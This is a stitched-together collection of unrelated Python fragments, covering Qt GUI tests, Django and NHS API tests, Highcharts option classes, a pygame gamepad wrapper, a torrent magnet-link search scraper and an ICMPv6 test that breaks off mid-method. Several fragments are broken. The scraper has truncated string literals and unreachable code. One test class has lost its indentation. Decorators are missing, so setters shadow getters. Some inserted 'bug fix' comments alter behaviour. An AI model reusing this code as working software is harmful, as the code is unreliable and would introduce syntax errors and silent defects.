        return QSettings(path, QSettings.IniFormat)

    def init_hosts_color_list(self):
        """Fill the host color palette used for automatic host colorization."""
        self.DEAFULT_HOST_COLORS = [QColor(255, 255, 235).rgb(), QColor(87, 93, 94).rgb(), QColor(205, 186, 136).rgb(), QColor(249, 168, 0).rgb(), QColor(232, 140, 0).rgb(), QColor(175, 128, 79).rgb(), QColor(221, 175, 39).rgb(), QColor(227, 217, 198).rgb(), QColor(186, 72, 27).rgb(), QColor(246, 120, 40).rgb(), QColor(255, 77, 6).rgb(), QColor(89, 25, 31).rgb(), QColor(216, 160, 166).rgb(), QColor(129, 97, 131).rgb(), QColor(196, 97, 140).rgb(), QColor(118, 104, 154).rgb(), QColor(188, 64, 119).rgb(), QColor(0, 56, 123).rgb(), QColor(15, 76, 100).rgb(), QColor(0, 137, 182).rgb(), QColor(99, 125, 150).rgb(), QColor(5, 139, 140).rgb(), QColor(34, 45, 90).rgb(), QColor(60, 116, 96).rgb(), QColor(54, 103, 53).rgb(), QColor(80, 83, 60).rgb(), QColor(17, 66, 50).rgb(), QColor(108, 124, 89).rgb(), QColor(97, 153, 59).rgb(), QColor(185, 206, 172).rgb(), QColor(0, 131, 81).rgb(), QColor(126, 186, 181).rgb(), QColor(0, 181, 26).rgb(), QColor(122, 136, 142).rgb(), QColor(108, 110, 107).rgb(), QColor(118, 106, 94).rgb(), QColor(56, 62, 66).rgb(), QColor(128, 128, 118).rgb(), QColor(127, 130, 116).rgb(), QColor(197, 199, 196).rgb(), QColor(137, 105, 62).rgb(), QColor(112, 69, 42).rgb(), QColor(141, 73, 49).rgb(), QColor(90, 56, 38).rgb(), QColor(233, 224, 210).rgb(), QColor(236, 236, 231).rgb(), QColor(43, 43, 44).rgb(), QColor(121, 123, 122).rgb()]
class DownloadAdministrator():
    """Locates a DownloadJob record and restarts its download operation."""

    def __init__(self):
        # The DownloadJob under administration; populated by search_for_a_download().
        self.download_job = None

    def search_for_a_download(self, **kwargs):
        """Look up and store the download job matching the given field filters."""
        queryset_filter = self.craft_queryset_filter(**kwargs)
        self.get_download_job(queryset_filter)

    def craft_queryset_filter(self, **kwargs):
        """Build a Django ``Q`` filter from the given field lookups.

        Raises:
            Exception: if no lookups were provided.

        Bug fix: this method was declared without ``self`` (while not being a
        staticmethod), so every bound call ``self.craft_queryset_filter(...)``
        raised ``TypeError: takes 0 positional arguments but 1 was given``.
        """
        if not kwargs:
            raise Exception('An invalid value was provided to the argument')
        return Q(**kwargs)

    def get_download_job(self, queryset_filter):
        """Fetch the DownloadJob matching *queryset_filter* into ``self.download_job``."""
        self.download_job = query_database_for_record(queryset_filter)

    def restart_download_operation(self):
        """Reset the job's progress fields and re-run or re-queue the download.

        Locally-run processes regenerate the download synchronously; otherwise
        the job id is pushed onto the bulk-download SQS queue.
        """
        self.update_download_job(error_message=None, file_size=0, job_status_id=(JOB_STATUS_DICT['queued'] if process_is_local() else JOB_STATUS_DICT['ready']), number_of_columns=0, number_of_rows=0, update_date=datetime.now(timezone.utc))
        if process_is_local():
            download_generation.generate_download(download_job=self.download_job)
        else:
            self.push_job_to_queue()

    def update_download_job(self, **kwargs):
        """Set the given fields on the download job and persist it."""
        for (field, value) in kwargs.items():
            setattr(self.download_job, field, value)
        self.download_job.save()

    def push_job_to_queue(self):
        """Send the job id to the bulk-download SQS queue for async processing."""
        queue = get_sqs_queue(queue_name=settings.BULK_DOWNLOAD_SQS_QUEUE_NAME)
        queue.send_message(MessageBody=str(self.download_job.download_job_id))
def test_that_the_manage_cases_tool_can_be_used_with_clean_storage(opened_main_window_clean, qtbot):
    """GUI test: with clean storage, create a case via the Manage Cases dialog
    and initialize it from scratch.

    The dialog interactions run inside ``handle_dialog``, which
    ``with_manage_tool`` invokes once the Manage Cases dialog is open.
    """
    gui = opened_main_window_clean
    def handle_dialog(dialog, cases_panel):
        # Tab 0: "create new case" -- starts with an empty case list.
        cases_panel.setCurrentIndex(0)
        current_tab = cases_panel.currentWidget()
        assert (current_tab.objectName() == 'create_new_case_tab')
        create_widget = get_child(current_tab, AddRemoveWidget)
        case_list = get_child(current_tab, CaseList)
        assert (case_list._list.count() == 0)
        def handle_add_dialog():
            # Runs later via QTimer: fill in the name dialog that the
            # "add" click below opens, then confirm it.
            dialog = wait_for_child(current_tab, qtbot, ValidatedDialog)
            dialog.param_name.setText('new_case')
            qtbot.mouseClick(dialog.ok_button, Qt.LeftButton)
        # Schedule the modal-dialog handler BEFORE clicking, since the click
        # blocks on the dialog.
        QTimer.singleShot(1000, handle_add_dialog)
        qtbot.mouseClick(create_widget.addButton, Qt.LeftButton)
        # The new case now shows up in the list.
        assert (case_list._list.count() == 1)
        assert (case_list._list.item(0).data(Qt.UserRole).name == 'new_case')
        # Tab 1: "initialize from scratch" -- the new case is preselected.
        cases_panel.setCurrentIndex(1)
        current_tab = cases_panel.currentWidget()
        assert (current_tab.objectName() == 'initialize_from_scratch_panel')
        combo_box = get_child(current_tab, CaseSelector)
        assert combo_box.currentText().startswith('new_case')
        initialize_button = get_child(current_tab, QPushButton, name='initialize_from_scratch_button')
        qtbot.mouseClick(initialize_button, Qt.LeftButton)
        dialog.close()
    with_manage_tool(gui, qtbot, handle_dialog)
class OptionSeriesLollipopLowmarker(Options):
    """Highcharts ``lowMarker`` options for lollipop series.

    NOTE(review): each option below appears as a getter/setter *pair* with the
    same name; the ``@property``/``@<name>.setter`` decorators were apparently
    stripped during extraction (as written, the setter silently shadows the
    getter). TODO confirm against the upstream ``Options`` subclasses.
    The ``_config_get(x)`` argument is the option's default value.
    """
    def enabled(self):
        """Whether the marker is enabled (default: None)."""
        return self._config_get(None)
    def enabled(self, flag: bool):
        self._config(flag, js_type=False)
    def enabledThreshold(self):
        """Point-distance threshold below which markers are hidden (default: 2)."""
        return self._config_get(2)
    def enabledThreshold(self, num: float):
        self._config(num, js_type=False)
    def fillColor(self):
        """Fill color of the marker (default: None)."""
        return self._config_get(None)
    def fillColor(self, text: str):
        self._config(text, js_type=False)
    def height(self):
        """Explicit marker image height (default: None)."""
        return self._config_get(None)
    def height(self, num: float):
        self._config(num, js_type=False)
    def lineColor(self):
        """Color of the marker border (default: '#ffffff')."""
        return self._config_get('#ffffff')
    def lineColor(self, text: str):
        self._config(text, js_type=False)
    def lineWidth(self):
        """Width of the marker border in px (default: 0)."""
        return self._config_get(0)
    def lineWidth(self, num: float):
        self._config(num, js_type=False)
    def radius(self):
        """Radius of the point marker in px (default: 4)."""
        return self._config_get(4)
    def radius(self, num: float):
        self._config(num, js_type=False)
    def states(self) -> 'OptionSeriesLollipopLowmarkerStates':
        """Sub-options for the marker's interaction states (hover/select)."""
        return self._config_sub_data('states', OptionSeriesLollipopLowmarkerStates)
    def symbol(self):
        """Predefined marker shape name (default: None)."""
        return self._config_get(None)
    def symbol(self, text: str):
        self._config(text, js_type=False)
    def width(self):
        """Explicit marker image width (default: None)."""
        return self._config_get(None)
    def width(self, num: float):
        self._config(num, js_type=False)
class TelemetryMessageVehicleTransmissionGearboxGear(object):
    """Swagger-generated model for the gearbox 'gear' telemetry payload.

    NOTE(review): ``recommended`` is defined twice below -- the
    ``@property``/``@recommended.setter`` decorators were apparently stripped
    during extraction; as written, the validating setter shadows the getter.
    TODO confirm against the generated upstream source.
    """
    # Maps attribute name -> swagger type for (de)serialization.
    swagger_types = {'recommended': 'str'}
    # Maps attribute name -> JSON key.
    attribute_map = {'recommended': 'recommended'}
    def __init__(self, recommended=None):
        self._recommended = None
        self.discriminator = None
        if (recommended is not None):
            self.recommended = recommended
    def recommended(self):
        """Return the recommended gear-change direction."""
        return self._recommended
    def recommended(self, recommended):
        """Set the recommended gear-change direction.

        Raises:
            ValueError: if *recommended* is not one of the allowed values.
        """
        allowed_values = ['None', 'Up', 'Down', 'UpDown']
        if (recommended not in allowed_values):
            raise ValueError('Invalid value for `recommended` ({0}), must be one of {1}'.format(recommended, allowed_values))
        self._recommended = recommended
    def to_dict(self):
        """Return the model's properties as a dict, recursing into sub-models."""
        result = {}
        for (attr, _) in six.iteritems(self.swagger_types):
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = list(map((lambda x: (x.to_dict() if hasattr(x, 'to_dict') else x)), value))
            elif hasattr(value, 'to_dict'):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = dict(map((lambda item: ((item[0], item[1].to_dict()) if hasattr(item[1], 'to_dict') else item)), value.items()))
            else:
                result[attr] = value
        if issubclass(TelemetryMessageVehicleTransmissionGearboxGear, dict):
            for (key, value) in self.items():
                result[key] = value
        return result
    def to_str(self):
        """Return a pretty-printed string representation of the model."""
        return pprint.pformat(self.to_dict())
    def __repr__(self):
        """For `print` and `pprint`."""
        return self.to_str()
    def __eq__(self, other):
        """True if both objects are this model with equal attributes."""
        if (not isinstance(other, TelemetryMessageVehicleTransmissionGearboxGear)):
            return False
        return (self.__dict__ == other.__dict__)
    def __ne__(self, other):
        """Inverse of __eq__."""
        return (not (self == other))
class TestAPIOrgViews(TestCase):
    """Integration tests for the ``/org_code`` API endpoint.

    Exercises free-text and exact-match lookups across the supported
    organisation types (practice, CCG, STP, regional team, PCN) against the
    ``orgs`` and ``practices`` fixtures.

    Refactor: every test repeated the same GET / assert-200 / parse-JSON
    boilerplate; that is now factored into ``_get_json``.
    """
    fixtures = ['orgs', 'practices']
    api_prefix = '/api/1.0'

    def _get_json(self, url):
        """GET *url* (following redirects), assert HTTP 200 and return the parsed JSON body."""
        response = self.client.get(url, follow=True)
        self.assertEqual(response.status_code, 200)
        return json.loads(response.content)

    def test_api_view_org_code(self):
        # Free-text search by practice name.
        content = self._get_json('%s/org_code?q=ainsdale&format=json' % self.api_prefix)
        self.assertEqual(len(content), 1)
        self.assertEqual(content[0]['code'], 'N84014')
        self.assertEqual(content[0]['name'], 'AINSDALE VILLAGE SURGERY')
        # Code-prefix search includes practice type/setting metadata.
        content = self._get_json('%s/org_code?q=P87&format=json' % self.api_prefix)
        self.assertEqual(len(content), 1)
        self.assertEqual(content[0]['code'], 'P87629')
        self.assertEqual(content[0]['name'], '1/ST ANDREWS MEDICAL PRACTICE')
        self.assertEqual(content[0]['type'], 'practice')
        self.assertEqual(content[0]['setting'], 4)
        self.assertEqual(content[0]['setting_name'], 'GP Practice')
        # A prefix matching several organisations returns all of them.
        content = self._get_json('%s/org_code?q=03&format=json' % self.api_prefix)
        self.assertEqual(len(content), 2)
        self.assertEqual(content[0]['code'], '03Q')
        self.assertEqual(content[0]['name'], 'NHS Vale of York')

    def test_api_view_org_code_org_type_open_ccgs_only(self):
        # A closed CCG must be excluded from the results.
        closed = PCT.objects.first()
        closed.close_date = datetime.date(2001, 1, 1)
        closed.save()
        content = self._get_json('%s/org_code?q=03&format=json' % self.api_prefix)
        self.assertEqual(len(content), 1)

    def test_api_view_org_code_org_type(self):
        # Restricting to practices only.
        content = self._get_json('%s/org_code?q=a&org_type=practice&format=json' % self.api_prefix)
        self.assertEqual(len(content), 3)
        self.assertEqual(content[0]['code'], 'P87629')
        self.assertEqual(content[0]['name'], '1/ST ANDREWS MEDICAL PRACTICE')
        # Restricting to CCGs only.
        content = self._get_json('%s/org_code?q=a&org_type=CCG&format=json' % self.api_prefix)
        self.assertEqual(len(content), 1)
        self.assertEqual(content[0]['code'], '03Q')
        self.assertEqual(content[0]['name'], 'NHS Vale of York')

    def test_api_view_org_code_is_exact(self):
        # Exact match on a full practice code.
        content = self._get_json('%s/org_code?q=N84014&exact=true&format=json' % self.api_prefix)
        self.assertEqual(len(content), 1)
        self.assertEqual(content[0]['code'], 'N84014')
        self.assertEqual(content[0]['name'], 'AINSDALE VILLAGE SURGERY')
        # A prefix is not an exact match.
        content = self._get_json('%s/org_code?q=P87&exact=true&format=json' % self.api_prefix)
        self.assertEqual(len(content), 0)

    def test_api_view_all_orgs(self):
        # No query returns every organisation, CCGs first, practices last.
        content = self._get_json('%s/org_code?format=json' % self.api_prefix)
        self.assertEqual(len(content), 7)
        self.assertEqual(content[0]['code'], '03Q')
        self.assertEqual(content[0]['name'], 'NHS Vale of York')
        self.assertEqual(content[0]['type'], 'CCG')
        self.assertEqual(content[(- 1)]['code'], 'B82018')
        self.assertEqual(content[(- 1)]['name'], 'ESCRICK SURGERY')
        self.assertEqual(content[(- 1)]['type'], 'practice')

    def test_stp_inexact_match(self):
        content = self._get_json('%s/org_code?q=northampton&format=json&org_type=stp' % self.api_prefix)
        self.assertEqual(len(content), 1)
        self.assertEqual(content[0]['code'], 'E55')
        self.assertEqual(content[0]['name'], 'Northamptonshire')

    def test_stp_exact_match(self):
        content = self._get_json('{}/org_code?q=E54&format=json&org_type=stp&exact=true'.format(self.api_prefix))
        self.assertEqual(len(content), 1)
        self.assertEqual(content[0]['code'], 'E54')
        self.assertEqual(content[0]['name'], 'Humber, Coast and Vale')

    def test_regional_team_inexact_match(self):
        content = self._get_json('{}/org_code?q=north&format=json&org_type=regional_team'.format(self.api_prefix))
        self.assertEqual(len(content), 1)
        self.assertEqual(content[0]['code'], 'Y54')
        self.assertEqual(content[0]['name'], 'NORTH OF ENGLAND COMMISSIONING REGION')

    def test_regional_team_exact_match(self):
        content = self._get_json('{}/org_code?q=Y55&format=json&org_type=regional_team&exact=true'.format(self.api_prefix))
        self.assertEqual(len(content), 1)
        self.assertEqual(content[0]['code'], 'Y55')
        self.assertEqual(content[0]['name'], 'MIDLANDS AND EAST OF ENGLAND COMMISSIONING REGION')

    def test_pcn_inexact_match(self):
        content = self._get_json('{}/org_code?q=transformational&format=json&org_type=pcn'.format(self.api_prefix))
        self.assertEqual(len(content), 1)
        self.assertEqual(content[0]['code'], 'PCN0001')
        self.assertEqual(content[0]['name'], 'Transformational Sustainability')

    def test_pcn_exact_match(self):
        content = self._get_json('{}/org_code?q=PCN0002&format=json&org_type=pcn&exact=true'.format(self.api_prefix))
        self.assertEqual(len(content), 1)
        self.assertEqual(content[0]['code'], 'PCN0002')
        self.assertEqual(content[0]['name'], 'Sustainable Transformation')
def _check_memory_usage(critical_threshold=95.0, warning_threshold=80.0):
    """Log current system memory usage at a severity matching how full it is.

    Generalized: the previously hard-coded thresholds are now parameters with
    defaults preserving the original behavior (CRITICAL above 95%, WARNING
    above 80%, INFO otherwise).

    Args:
        critical_threshold: percent usage above which a CRITICAL message is logged.
        warning_threshold: percent usage above which a WARNING message is logged.
    """
    memory_usage = psutil.virtual_memory().percent
    if (memory_usage > critical_threshold):
        logging.critical(f'System memory is critically low: {memory_usage}%')
    elif (memory_usage > warning_threshold):
        logging.warning(f'System memory is running low: {memory_usage}%')
    else:
        logging.info(f'System memory usage: {memory_usage}%')
def display_livetv_type(menu_params, view):
    """Build the Live TV section of the plugin menu.

    Adds three directory entries under the current view: channels, currently
    airing recommended programs, and recordings, then closes the directory.
    """
    handle = int(sys.argv[1])
    xbmcplugin.setContent(handle, 'files')
    view_name = view.get('Name')

    def add_entry(endpoint, params, label_string_id):
        # Compose the Emby query URL and register one directory entry for it.
        path = get_emby_url(endpoint, params)
        url = sys.argv[0] + '?url=' + urllib.parse.quote(path) + '&mode=GET_CONTENT&media_type=livetv'
        add_menu_directory_item(view_name + string_load(label_string_id), url)

    # Channels. (Param dicts keep their original insertion order so the
    # generated query strings are unchanged.)
    add_entry('{server}/emby/LiveTv/Channels',
              {'UserId': '{userid}', 'Recursive': False, 'ImageTypeLimit': 1, 'Fields': '{field_filters}'},
              30360)
    # What's on now (recommended, currently airing).
    add_entry('{server}/emby/LiveTv/Programs/Recommended',
              {'UserId': '{userid}', 'IsAiring': True, 'ImageTypeLimit': 1, 'Fields': 'ChannelInfo,{field_filters}', 'EnableTotalRecordCount': False},
              30361)
    # Recordings.
    add_entry('{server}/emby/LiveTv/Recordings',
              {'UserId': '{userid}', 'Recursive': False, 'ImageTypeLimit': 1, 'Fields': '{field_filters}', 'EnableTotalRecordCount': False},
              30362)
    xbmcplugin.endOfDirectory(handle)
class ciligogo(object):
    """Magnet-link search engine plugin for the 'ciligogo' site.

    NOTE(review): several URL string literals in this class were truncated
    (e.g. ``url = '``) -- apparently the concrete site addresses were stripped
    from this copy; as written the class is not syntactically valid. The
    logic below is documented as-is; confirm the URLs against upstream.
    """
    url = '
    name = 'ciligogo'
    # Sort orders accepted by search().
    support_sort = ['relevance', 'addtime', 'size', 'popular']
    page_result_count = 10
    supported_categories = {'all': ''}
    def __init__(self):
        pass
    def getsearchurl(self):
        """Discover the currently working site mirror and cache it.

        Stores the result in the plugin's 'magneturls' storage under this
        engine's name; errors are logged to the Kodi log and swallowed.
        """
        try:
            magneturls = plugin.get_storage('magneturls')
            magneturls[self.name] = '
            magneturls.sync()
            return
            # NOTE(review): code below the 'return' is unreachable as written;
            # possibly an intentional short-circuit or an extraction artifact.
            jubturl = '
            rsp = _
            # Pick the first reachable mirror link from the hub page.
            for match in re.finditer('\\x3Ctd\\x3E\\s*\\x3Ca\\s+href\\x3D[\\x22\\x27](?P<url>.*?)[\\x22\\x27]', rsp, (re.IGNORECASE | re.DOTALL)):
                if url_is_alive(match.group('url')):
                    jubturl = match.group('url')
                    break
            rsp = _ + '/cn/index.html'))
            match = re.search('window\\x2Eopen\\x28(?:\\x26\\x2334\\x3B)?(?P<url>(?: rsp, (re.IGNORECASE | re.DOTALL))
            if match:
                magneturls[self.name] = [match.group('url').strip().rstrip('/')]
            else:
                magneturls[self.name] = '
            magneturls.sync()
        except:
            xbmc.log(msg=format_exc(), level=xbmc.LOGERROR)
    def search(self, what, cat='all', sorttype='relevance', page='1'):
        """Search the site for *what* and return a result dictionary.

        Returns a dict with keys 'state' (success flag), 'list' (one dict per
        torrent: name/size/link/date/...), 'sorttype', and optionally
        'nextpage' when more result pages exist.
        """
        result = {}
        result['state'] = False
        result['list'] = []
        result['sorttype'] = sorttype
        # Map the generic sort names onto the site's sort tokens.
        if (sorttype == 'addtime'):
            sorttype = 'time'
        elif (sorttype == 'size'):
            sorttype = 'size'
        elif (sorttype == 'relevance'):
            sorttype = 'rel'
        else:
            sorttype = 'hits'
        magneturls = plugin.get_storage('magneturls')
        searchurl = magneturls[self.name]
        searchurl = ('%s/so/%s_%s_%s.html' % (searchurl, parse.quote(what), str(sorttype), str(int(page))))
        try:
            pageresult = _
            # Regex over the hex-escaped HTML: captures the 40-char btih hash,
            # title, creation time and file size of each row.
            rmain = '\\x2Fbt\\x2F(?P<magnet>[a-z0-9]{40})\\x2Ehtml.*?[\\x22\\x27]\\x3E(?P<title>.*?)\\x3C\\x2Fa\\x3E.*?.*?\\x3Cb\\x3E(?P<createtime>.*?)\\x3C\\x2Fb\\x3E.*?.*?\\x3E(?P<filesize>.*?)\\x3C\\x2Fb\\x3E'
            reobj = re.compile(rmain, (re.IGNORECASE | re.DOTALL))
            for match in reobj.finditer(pageresult):
                title = match.group('title').replace('<em>', '').replace('</em>', '').strip()
                filesize = match.group('filesize').strip()
                createtime = match.group('createtime').strip()
                magnet = ('magnet:?xt=urn:btih:' + match.group('magnet'))
                res_dict = dict()
                res_dict['name'] = title
                res_dict['size'] = filesize
                res_dict['filecount'] = ''
                res_dict['seeds'] = ''
                res_dict['leech'] = ''
                res_dict['link'] = magnet
                res_dict['date'] = createtime
                res_dict['desc_link'] = ''
                res_dict['engine_url'] = self.url
                result['list'].append(res_dict)
            # A 'next page' marker in the HTML means more results exist.
            if (pageresult.find('»') >= 0):
                result['nextpage'] = True
        except Exception as ex:
            xbmc.log(msg=format_exc(), level=xbmc.LOGERROR)
            return result
        result['state'] = True
        return result
def get_basic_config():
    """Build the default configuration pair for the calibration pipeline.

    Returns:
        tuple: ``(FilteringConfig, HandEyeConfig)`` populated with the
        standard default values (same values as always; only the
        construction style differs from a flat list of assignments).
    """
    filtering = FilteringConfig()
    for attr, value in (
            ('smoothing_kernel_size_A', 25),
            ('clipping_percentile_A', 99.5),
            ('smoothing_kernel_size_B', 25),
            ('clipping_percentile_B', 99.0)):
        setattr(filtering, attr, value)

    hand_eye = HandEyeConfig()
    for attr, value in (
            ('use_baseline_approach', False),
            ('algorithm_name', ''),
            ('enable_exhaustive_search', False),
            ('min_num_inliers', 10),
            ('prefilter_poses_enabled', False),
            ('prefilter_dot_product_threshold', 0.95),
            ('ransac_sample_size', 3),
            ('ransac_sample_rejection_scalar_part_equality_tolerance', 0.01),
            ('ransac_max_number_iterations', 20),
            ('ransac_enable_early_abort', True),
            ('ransac_outlier_probability', 0.5),
            ('ransac_success_probability_threshold', 0.99),
            ('ransac_inlier_classification', 'scalar_part_equality'),
            ('ransac_position_error_threshold_m', 0.02),
            ('ransac_orientation_error_threshold_deg', 1.0),
            ('ransac_model_refinement', True),
            ('ransac_evaluate_refined_model_on_inliers_only', False),
            ('hand_eye_calibration_scalar_part_equality_tolerance', 0.04),
            ('visualize', False),
            ('visualize_plot_every_nth_pose', 10)):
        setattr(hand_eye, attr, value)
    return (filtering, hand_eye)
def read_schemaless(iostream, schema, num_records, runs):
    """Benchmark fastavro's schemaless reader and return one decoded record.

    Times ``num_records`` sequential decodes of *iostream*, repeated ``runs``
    times, prints the best run (in ms) via ``TIMEIT_FORMAT``, then rewinds
    the stream and returns a single decoded record.

    Note: the locals ``iostream``, ``schema`` and ``schemaless_reader`` are
    referenced by name inside the timed statement string (via
    ``globals=locals()``), so ``schema`` is deliberately rebound to its
    parsed form under the same name.
    """
    schema = fastavro.parse_schema(schema)
    schemaless_reader = fastavro.schemaless_reader
    timings = timeit.repeat('iostream.seek(0);schemaless_reader(iostream, schema);', number=num_records, repeat=runs, globals=locals())
    best_ms = min(timings) * 1000.0
    print(TIMEIT_FORMAT.format('read schemaless fastavro', num_records, runs, best_ms))
    iostream.seek(0)
    return schemaless_reader(iostream, schema)
def is_text(path, prob_lines=1000, probe_size=4096):
    """Heuristically decide whether the file at *path* is UTF-8 text.

    The file is treated as binary when its first *probe_size* bytes contain
    a NUL byte.  Otherwise roughly the first *prob_lines* lines must decode
    as UTF-8.  Returns True for text, False for binary / non-UTF-8 content.
    I/O errors other than UnicodeDecodeError propagate to the caller.
    """
    try:
        with open(path, 'rb') as handle:
            # NUL bytes are an immediate "binary" verdict.
            if b'\x00' in handle.read(probe_size):
                return False
        with open(path, 'r', encoding='utf-8') as handle:
            # Iterating forces decoding; stop after the probe budget.
            for line_no, _line in enumerate(handle):
                if line_no > prob_lines:
                    break
        return True
    except UnicodeDecodeError:
        return False
class ExtendedCodecsTest(unittest.TestCase):
def test_decode_mac_japanese(self):
self.assertEqual(b'x\xfe\xfdy'.decode('x_mac_japanese_ttx'), (((chr(120) + chr(8482)) + chr(169)) + chr(121)))
def test_encode_mac_japanese(self):
self.assertEqual(b'x\xfe\xfdy', (((chr(120) + chr(8482)) + chr(169)) + chr(121)).encode('x_mac_japanese_ttx'))
def test_decode_mac_trad_chinese(self):
self.assertEqual(b'\x80'.decode('x_mac_trad_chinese_ttx'), chr(92))
def test_decode_mac_romanian(self):
self.assertEqual(b'x\xfb'.decode('mac_romanian'), (chr(120) + chr(730))) |
def compute_eigvals_eigvecs(score: Tensor, node_val: Tensor) -> Tuple[(bool, Tensor, Tensor, Tensor)]:
    """Compute the first gradient and the soft-abs eigendecomposition of the
    negative Hessian of *score* with respect to *node_val*.

    Returns ``(ok, first_gradient, eig_vecs, eig_vals)``; when either the
    gradient or the Hessian is invalid, ``ok`` is False and the remaining
    entries are zero tensors.
    """
    (first_gradient, hessian) = tensorops.gradients(score, node_val)
    # BUG FIX: the original used `or`, which accepted the pair when only ONE
    # of the two tensors was valid -- but both are consumed below (and the
    # variable name says "first_grad_and_hessian"), so both must be valid.
    is_valid_first_grad_and_hessian = (is_valid(first_gradient) and is_valid(hessian))
    if (not is_valid_first_grad_and_hessian):
        return (False, tensor(0.0), tensor(0.0), tensor(0.0))
    # Detach so the eigendecomposition does not participate in autograd.
    neg_hessian = ((- 1) * hessian.detach())
    (eig_vecs, eig_vals) = soft_abs_inverse(neg_hessian)
    return (True, first_gradient, eig_vecs, eig_vals)
class GamePad(Input, Output):
    """Wrapper around a pygame joystick with polling and wait helpers.

    NOTE(review): several defs below (`get_gampad_count` without self,
    `track_button_events` / `track_motion_events` / `id` / `name` /
    `joystick` shadowed by __init__ attribute assignments) plus the bare
    `_button_events.setter` / `_motion_events.setter` expression statements
    strongly suggest @staticmethod / @property / @x.setter decorators were
    stripped from this file -- confirm against the upstream source before
    relying on this class as-is.
    """
    def get_gampad_count():
        # Number of connected joysticks (name typo preserved from original).
        return pygame.joystick.get_count()
    def __init__(self, gamepad_id, track_button_events=True, track_motion_events=False):
        # Requires an initialized expyriment experiment; pygame joystick
        # subsystem is driven through the wrapped Joystick object.
        if (not _internals.active_exp.is_initialized):
            raise RuntimeError('Cannot create GamePad before expyriment.initialize()!')
        Input.__init__(self)
        Output.__init__(self)
        # With the (presumably stripped) property setters these assignments
        # would also toggle pygame event filtering; as written they just
        # shadow the methods of the same name.
        self.track_button_events = track_button_events
        self.track_motion_events = track_motion_events
        self._joystick = pygame.joystick.Joystick(gamepad_id)
        self._joystick.init()
    def track_button_events(self):
        # Getter: whether JOYBUTTONDOWN/UP events are tracked.
        return self._track_button_events
    _button_events.setter
    def track_button_events(self, value):
        # Setter: allow or block joystick button events in pygame's queue.
        self._track_button_events = value
        if value:
            pygame.event.set_allowed(pygame.JOYBUTTONDOWN)
            pygame.event.set_allowed(pygame.JOYBUTTONUP)
        else:
            pygame.event.set_blocked(pygame.JOYBUTTONDOWN)
            pygame.event.set_blocked(pygame.JOYBUTTONUP)
    def track_motion_events(self):
        # Getter: whether axis/ball/hat motion events are tracked.
        return self._track_motion_events
    _motion_events.setter
    def track_motion_events(self, value):
        # Setter: allow or block joystick motion events in pygame's queue.
        self._track_motion_events = value
        if value:
            pygame.event.set_allowed(pygame.JOYAXISMOTION)
            pygame.event.set_allowed(pygame.JOYBALLMOTION)
            pygame.event.set_allowed(pygame.JOYHATMOTION)
        else:
            pygame.event.set_blocked(pygame.JOYAXISMOTION)
            pygame.event.set_blocked(pygame.JOYBALLMOTION)
            pygame.event.set_blocked(pygame.JOYHATMOTION)
    def id(self):
        # pygame device id of the wrapped joystick.
        return self._joystick.get_id()
    def name(self):
        # Human-readable device name.
        return self._joystick.get_name()
    def joystick(self):
        # Underlying pygame.joystick.Joystick instance.
        return self._joystick
    def get_numaxes(self):
        return self._joystick.get_numaxes()
    def get_axis(self, axis):
        # pump() keeps pygame's internal state fresh before polling.
        pygame.event.pump()
        return self._joystick.get_axis(axis)
    def get_numballs(self):
        return self._joystick.get_numballs()
    def get_ball(self, ball):
        pygame.event.pump()
        return self._joystick.get_ball(ball)
    def get_numbuttons(self):
        return self._joystick.get_numbuttons()
    def get_button(self, button):
        pygame.event.pump()
        return self._joystick.get_button(button)
    def get_numhats(self):
        return self._joystick.get_numhats()
    def get_hat(self, hat):
        pygame.event.pump()
        return self._joystick.get_hat(hat)
    def clear(self):
        # Drop all pending joystick events from pygame's queue.
        pygame.event.clear(pygame.JOYBUTTONDOWN)
        pygame.event.clear(pygame.JOYBUTTONUP)
        pygame.event.clear(pygame.JOYAXISMOTION)
        pygame.event.clear(pygame.JOYBALLMOTION)
        pygame.event.clear(pygame.JOYHATMOTION)
        if self._logging:
            _internals.active_exp._event_file_log('GamePad,cleared', 2)
    def wait_press(self, buttons=None, duration=None, callback_function=None, process_control_events=True):
        """Busy-wait until one of *buttons* is pressed or *duration* (ms)
        elapses.

        Returns ``(button, rt)`` where ``rt`` is the reaction time in ms;
        ``button`` may also be a CallbackQuitEvent from a callback, or None
        on timeout.  With no *buttons* given, all buttons are watched.
        """
        if _internals.skip_wait_methods:
            return (None, None)
        start = get_time()
        rt = None
        _button = None
        self.clear()
        if (buttons is None):
            buttons = list(range(self.get_numbuttons()))
        # Accept a single button as well as any iterable of buttons.
        try:
            buttons = list(buttons)
        except Exception:
            buttons = [buttons]
        done = False
        while (not done):
            # User-supplied per-iteration callback may abort the wait.
            if isinstance(callback_function, FunctionType):
                rtn_callback = callback_function()
                if isinstance(rtn_callback, _internals.CallbackQuitEvent):
                    _button = rtn_callback
                    rt = int(((get_time() - start) * 1000))
                    done = True
            if _internals.active_exp.is_initialized:
                # Experiment-registered wait callback gets the same chance.
                rtn_callback = _internals.active_exp._execute_wait_callback()
                if isinstance(rtn_callback, _internals.CallbackQuitEvent):
                    _button = rtn_callback
                    rt = int(((get_time() - start) * 1000))
                    done = True
                if process_control_events:
                    # Quit/control shortcuts (mouse quit, control keys).
                    if (_internals.active_exp.mouse.process_quit_event() or _internals.active_exp.keyboard.process_control_keys()):
                        done = True
            for button in buttons:
                if self.get_button(button):
                    _button = button
                    rt = int(((get_time() - start) * 1000))
                    done = True
                    break
            if (_button is not None):
                done = True
                break
            if duration:
                # Timeout check (ms).
                if (int(((get_time() - start) * 1000)) >= duration):
                    done = True
                    break
        if self._logging:
            _internals.active_exp._event_file_log('Gamepad,received,{0},wait_press'.format(_button))
        return (_button, rt)
class Test_icmpv6_echo_request(unittest.TestCase):
    """Parser/serializer round-trip tests for ICMPv6 echo request packets.

    The class-level constants describe one reference packet: `buf` is the
    8-byte ICMPv6 header + echo header, `data` an optional payload.
    """
    type_ = 128            # ICMPV6_ECHO_REQUEST
    code = 0
    csum = 42354           # checksum of the reference buffer
    id_ = 30240
    seq = 0
    data = b'\x01\xc9\xe76\xd39\x06\x00'
    buf = b'\x80\x00\xa5rv \x00\x00'
    def setUp(self):
        pass
    def tearDown(self):
        pass
    def test_init(self):
        # A freshly constructed echo carries no payload.
        echo = icmpv6.echo(0, 0)
        eq_(echo.id, 0)
        eq_(echo.seq, 0)
        eq_(echo.data, None)
    def _test_parser(self, data=None):
        # Parse the reference buffer (optionally with payload appended) and
        # check every decoded field; `n` is the remaining-payload slot.
        buf = (self.buf + (data or b''))
